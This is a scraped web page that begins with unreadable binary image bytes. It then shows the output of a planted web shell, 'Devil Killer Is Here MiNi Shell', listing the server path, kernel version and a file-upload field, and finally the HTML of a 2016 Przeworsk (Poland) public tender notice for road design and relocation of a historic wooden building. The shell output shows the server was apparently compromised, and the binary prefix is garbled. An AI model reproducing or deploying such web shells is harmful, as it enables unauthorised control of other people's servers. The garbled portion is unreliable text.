JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160609/76775-N-2016.html

<p class="kh_header"><b>Przeworsk: Przetarg nieograniczony z podziałem na części  dla zadań pn: Opracowanie dokumentacji projektowej na: przebudowę i remonty pasów drogowych na terenie miasta Przeworska oraz na inwentaryzację i rewitalizację  zabytkowego budynku zlokalizowanego przy  ul. Tkackiej  wraz z  jego przeniesieniem na teren skansenu Pastewnik w Przeworsku.</b><br>
<b>Numer ogłoszenia: 76775 - 2016; data zamieszczenia: 09.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta  Przeworska , ul. Jagiellońska 10, 37-200 Przeworsk, woj. podkarpackie, tel. 016 6487600, faks 016 6487600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.przeworsk.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony z podziałem na części  dla zadań pn: Opracowanie dokumentacji projektowej na: przebudowę i remonty pasów drogowych na terenie miasta Przeworska oraz na inwentaryzację i rewitalizację  zabytkowego budynku zlokalizowanego przy  ul. Tkackiej  wraz z  jego przeniesieniem na teren skansenu Pastewnik w Przeworsku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa na Opracowanie dokumentacji projektowej na: przebudowę i remonty pasów drogowych na terenie miasta Przeworska oraz na inwentaryzację i rewitalizację  zabytkowego budynku zlokalizowanego przy  ul. Tkackiej  wraz z  jego przeniesieniem na teren skansenu Pastewnik w Przeworsku. 

Przedmiot zamówienia został podzielony na poszczególne części:

Część nr.1- Opracowanie dokumentacji projektowej dla ulicy Kasztanowej, Warzywnej, Grochowej, Rzecznej i Nad Stawem w Przeworsku ( długość ok. 1 800 m)
Część nr.2- Opracowanie dokumentacji projektowej dla ulicy Jedności, Długiej, Solarza oraz bocznej Gorliczyńskiej w Przeworsku ( długość ok. 2 000 m)
Część nr.3- Opracowanie dokumentacji projektowej dla ulicy bocznej Misiągiewicza i bocznej Zygmuntowskiej w Przeworsku ( długość ok. 500 m)
Część nr.4- Opracowanie dokumentacji projektowej wraz z inwentaryzacją i rewitalizacją  zabytkowego budynku zlokalizowanego przy  ul.Tkackiej  oraz jego przeniesieniem na teren skansenu Pastewnik w Przeworsku


 Opis dla części nr. 1,2,3 
2. 	Zamawiający wymaga aby dokumentacja była zgodna z wytycznymi  PROGRAMU ROZWOJU GMINNEJ POWIATOWEJ INFRASTRUKTURY DROGOWEJ na lata 2016-2019
3. 	Dokumentacja projektowa powinna spełniać wszystkie wymogi obowiązującego prawa budowlanego i innych obowiązujących przepisów.
4. W ramach zamówienia należy opracować:
1)	koncepcję  i przedstawić Zamawiającemu do zatwierdzenia,
2)	projekt budowlany lub wykonawczy wraz z  materiałami do zgłoszenia,
4.1. Dokumentacja projektu budowlanego winna zawierać w szczególności:
- oświadczenia, że projekt budowlany (wykonawczy)  jest wykonany  zgodnie z umową, obowiązującymi przepisami techniczno - budowlanymi, normami i wytycznymi oraz, że został wykonany w stanie kompletnym z punktu widzenia celu, któremu ma służyć, uprawnienia, zaświadczenie właściwej izby samorządu zawodowego,
- projekt zagospodarowania terenu objętego opracowaniem w granicach ustalonej lokalizacji,
- projekt  kanalizacji deszczowej wraz z odwodnieniem ulic z wykorzystaniem istniejącej kanalizacji - dotyczy części nr.1 i części nr. 2,
- projekt oświetlenia ulic (oświetlenie typu LED),
- winna zawierać wszelkie niezbędne warunki, opinie, uzgodnienia i pozwolenia,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanych obiektów.

4.2  Dokumentacja projektu ponadto powinna zawierać w szczególności:
- część drogową,
- projekty dla poszczególnych branż,
- projekt docelowej organizacji ruchu, projekt organizacji ruchu na czas budowy,
- przedmiary robót (wraz ze szczegółowymi wyliczeniami ilości robót) oraz kosztorysy inwestorskie dla wszystkich robót objętych dokumentacją,
 - szczegółowe specyfikacje techniczne SST,
- wszelkie inne opracowania niezbędne dla kompletności dokumentacji wynikające z warunków wydanych dla potrzeb dokumentacji.

5. Dokumentacja projektowa w zakresie ilościowym:
-  projekt budowlany należy opracować w 4 egz., kosztorysy inwestorskie, przedmiary robót i inne opracowania niezbędne dla kompletności dokumentacji oraz specyfikacje techniczne w 1 egzemplarzu. ( w przypadku opracowania dokumentacji w formie zgłoszenia 4 egzemplarze projektu wykonawczego + 3 egzemplarze materiałów do zgłoszenia)

6. Wymagania edytorskie dla dokumentacji projektowej:
a) przekazana kompletna dokumentacja projektowa wraz z uzgodnieniami w ilości egzemplarzy określonych w ust.5 ma być w formie papierowej w teczkach z opisem w języku polskim oraz na nośniku CD-ROM w jednym egzemplarzu,
b) rysunki winny być zapisane w formacie *.pdf  lub *.jpg  i *.dwg,
c) specyfikacje techniczne mają być zapisane w powszechnie używanym edytorze tekstowym formacie*.doc  i  *.pdf,
d) przedmiary robót mają być zapisane w powszechnie używanym arkuszu kalkulacyjnym w formacie *.xls  lub *.doc  i *.pdf, oraz wersji edytowalnej *.ath.
e) kosztorysy inwestorskie mają być zapisane w programie kosztorysowym dostępnym na rynku polskim,
f) wszystkie dokumenty uzgadniające, decyzje, opinie itd. mają być zeskanowane i załączone do dokumentacji przekazywanej na nośniku CD-ROM.

7. Jednostka projektowa zobowiązana jest do:
a)	uzyskania wszystkich niezbędnych warunków technicznych od dysponentów sieci, opinii,  uzgodnień i sprawdzeń rozwiązań projektowych podanych w siwz, w zakresie wynikającym z przepisów oraz wymaganych do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej,
b)	uzgodnienia z Zamawiającym ostatecznej geometrii dróg, skrzyżowań, konstrukcji jezdni, obiektów inżynierskich,  docelowej organizacji ruchu,
c)	opisywania proponowanych materiałów i urządzeń z zachowaniem przepisów wynikających z art. 29-30 ustawy Prawo zamówień publicznych, tj. za pomocą parametrów technicznych bez podawania ich nazw, patentów lub pochodzenia.

8. Zamawiający przekaże wykonawcy:
- 	mapy do celów projektowych które zostaną zlecone przez Zamawiającego po ustaleniu zakresu opracowań 	wynikających z dokumentacji projektowej
- 	warunki na przyłącza oświetleniowe i kanalizacji deszczowej

9.	Zamawiający dopuszcza opracowanie dokumentacji w formie zgłoszenia przebudowy dróg w ramach istniejącego 	pasa drogowego.

Opis dla części nr.4
1.Budynek przy ul. Tkacka 1 jest budynkiem wpisanym do rejestru zabytków nieruchomych . Jest to budynek  wolnostojący założony na rzucie prostokąta, parterowy , drewniany, nakryty dachem naczółkowym. Podwalina wsparta na ceglanej podmurówce, ściany z bali drewnianych układanych w konstrukcji zrębowej łączonych w węglach w jaskółczy ogon z ostatkami. Elewacja frontowa czteroosiowa z wejściem w drugiej osi, układ wnętrza dwutraktowy z sienią na osi, pomieszczenia nakryte stropami belkowymi, powierzchnia zabudowy 86,30 m kw. Budynek przeznaczony jest do przeniesienia na teren skansenu Pastewnik w Przeworsku. Opracowanie projektowe powinno zawierać: 
1)	szczegółową inwentaryzację architektoniczno - konstrukcyjną istniejącego obiektu w tym materiałów (belek konstrukcyjnych nadających się do ponownego wbudowania) umożliwiających odtworzenie konstrukcji budynku wraz z fizycznym przyporządkowaniem odpowiednich numerów za pomocą marek stalowych,
2)	projekt budowlany budynku na terenie skansenu, 
3)	projekty  instalacji wewnętrznych wraz z przyłączami do mediów w obrębie skansenu, 
4)	Projekt rozbiórki budynku z ul. Tkackiej 1
5)	Projekt rozbiórki istniejących budynków campingowych na terenie skansenu Pastewnik

2.Treść i forma opracowania projektowego
1)	projekt budowlano- wykonawczy w zakresie uwzględniającym specyfikę robót budowlanych,
2)	przedmiary robót , tabele elementów scalonych,
3)	kosztorysy inwestorskie, przedmiary robót,
4)	informację dotyczącą bezpieczeństwa i ochrony zdrowia,
5)	specyfikacje techniczne wykonania i odbioru robót zgodnie z obowiązującą systematyką podziału robót budowlanych,
6)	wymagane uzgodnienia niezbędne do uzyskania pozwolenia na budowę, w szczególności wymagane opinie i ekspertyzy,  decyzje konserwatora zabytków ,z rzeczoznawcą ds. p.poż , sanitarnych, BHP,  oraz inne wymagane ustawą Prawo budowlane),
7)	kompletny  wniosek na uzyskanie pozwolenia na budowę,

3. Zamawiający przekaże Wykonawcy:
1)	mapy do celów projektowych 
2)	inwentaryzację budowlaną ( załącznik nr.2 do siwz) 
3)	Decyzję ws. wpisania zabytku nieruchomego do rejestru zabytków.( załącznik nr.3 do siwz)
4)	Decyzję o warunkach zabudowy ( załącznik nr. 3a  do siwz).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca

a) złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy pzp- wzór stanowi załącznik nr.4 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia powyższego warunku Zamawiający wymaga, aby Wykonawca wykazał:
-opracowanie co najmniej jednej dokumentacji projektowej w zakresie budowy lub przebudowy dróg publicznych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane oraz z załączenie  dowodów, czy zostały wykonane lub są wykonywane należycie o wartości min. 20 000,00 zł za jedną dokumentację - dotyczy części nr.1,2,3
- opracowanie co najmniej jednej dokumentacji projektowej w zakresie remontu , odbudowy lub modernizacji budynków mających status obiektu zabytkowego w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane oraz z załączenie  dowodów, czy zostały wykonane lub są wykonywane należycie o wartości min.20 000,00 zł za jedną dokumentację - dotyczy części nr.4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca

a) złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy pzp- wzór stanowi załącznik nr.4 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca

a) złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy pzp- wzór stanowi załącznik nr.4 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca

a) złoży oświadczenie zgodnie z art. 22 ust. 1 ustawy pzp- wzór stanowi załącznik nr.4 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. formularz ofertowy
2. pełnomocnictwo</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zgodnie z wymaganiami siwz</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin wykonania zamówienia - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Stosownie do treści art. 144 ust. 1 ustawy Prawo zamówień publicznych (t. j. Dz. U. z 2015r. poz. 2164 z późn. zm.) dopuszcza się możliwość dokonywania zmian istotnych postanowień zawartej umowy, w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w zakresie: 
a)	w przypadku działania siły wyższej tzn. niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było uniknąć, w szczególności niesprzyjających warunków atmosferycznych i klęsk żywiołowych, katastrofy budowlanej, mających bezpośredni wpływ na terminowość wykonania zamówienia, 
b)	w przypadku napotkania przez Wykonawcę lub Zamawiającego okoliczności niemożliwych do przewidzenia i niezależnych od nich, 
c)	jeżeli podczas wykonywania zamówienia okaże się, że konieczne do wykonania są czynności dodatkowe, których nie można było przewidzieć, od których wykonania uzależnione jest wykonanie zamówienia, 
d)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia, lub wytycznych dotyczących realizacji tego zadania.
e)	 zmiany sposobu realizacji przedmiotu zamówienia, za porozumieniem stron, jeżeli zmiana będzie korzystna dla Zamawiającego i przyczyni się do poprawy jakości lub efektywności świadczonych usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.przeworsk.um.gov.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 37-200 Przeworsk ul. Jagiellońska 10 pokój nr.122.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2016 godzina 10:00, miejsce: 37-200 Przeworsk ul. Jagiellońska 10 pokój nr.103 (kancelaria ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach ww. postępowania Zamawiający będzie zabiegał o dofinansowanie ze środków publicznych z Unii Europejskiej i ze środków rządowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowej dla ulicy Kasztanowej, Warzywnej, Grochowej, Rzecznej i Nad Stawem w Przeworsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla ulicy Kasztanowej, Warzywnej, Grochowej, Rzecznej i Nad Stawem w Przeworsku ( długość ok. 1 800 m).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. termin wykonania zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Opracowanie dokumentacji projektowej dla ulicy Jedności, Długiej, Solarza oraz bocznej Gorliczyńskiej w Przeworsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla ulicy Jedności, Długiej, Solarza oraz bocznej Gorliczyńskiej w Przeworsku ( długość ok. 2 000 m).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 150.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. t - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji projektowej dla ulicy bocznej Misiągiewicza i bocznej Zygmuntowskiej w Przeworsku.</p>
